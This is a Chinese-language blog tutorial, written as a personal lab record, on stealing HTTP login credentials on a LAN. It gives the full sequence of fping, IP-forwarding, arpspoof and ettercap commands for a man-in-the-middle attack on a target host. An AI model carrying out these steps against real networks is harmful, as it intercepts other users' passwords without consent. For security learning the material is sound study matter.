當前位置:
首頁 > 最新 > kali 內網HTTP賬號密碼獲取記錄

kali 內網HTTP賬號密碼獲取記錄

註:本教程只用於學習使用,切勿拿去搞破壞,一切法律後果與本人無關

1.原理:

在區域網環境中,通過ARP欺騙,將目標主機的網路包都流經攻擊者,然後再通過嗅探的方式從而獲取到HTTP的一些數據信息。下面主要是利用ettercap來進行嗅探

(大部分的大型網站都無法進行嗅探獲取密碼。試驗失敗了,這裡做實驗記錄)

2. 區域網IP掃描:

命令:

fping -asg 192.168.43.0/24

ctrl+c停止掃描

3. 工具使用:arpspoof、ettercap

命令:

arpspoof -i +網卡 -t +網關 +目標IP

ettercap -Tq -i +網卡

-T參數即--text,啟動文本模式;-q參數即--quiet,不顯示包的內容

ettercap是在linux下運行的 。其實功能都是差不多的,我稱呼它為嗅探工具,ARP欺騙,DNS,劫持,中間人攻擊等等。總之這是一款強大的安全測試工具。

4. 實踐記錄:

4.1查看自己的IP和網關:ifconfig、route -n

4.2掃描其他人的IP:fping 192.168.43.0/24

4.3進行IP流量轉發:

echo 1 > /proc//sys/net/ipv4/ip_forward

4.4進行ARP欺騙

命令:arpspoof -i eth0 -t 192.168.43.1 192.168.43.38

4.5再開一個終端,開始嗅探

輸入:ettercap -Tq -i eth0

4.6當受害者登陸後,即可嗅探到賬戶和密碼

當登錄名稱的字元是中文時,在嗅探到的內容中Content中的內容不是中文而是其URL形式的編碼:

對於這種編碼直接URL解碼即可,最簡單的方法是去URL解碼的網站進行解碼:

end

掃碼即可關注~

ID和我一起學習記錄


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 程帥帥 的精彩文章:

kali linux永恆之藍漏洞記錄

TAG:程帥帥 |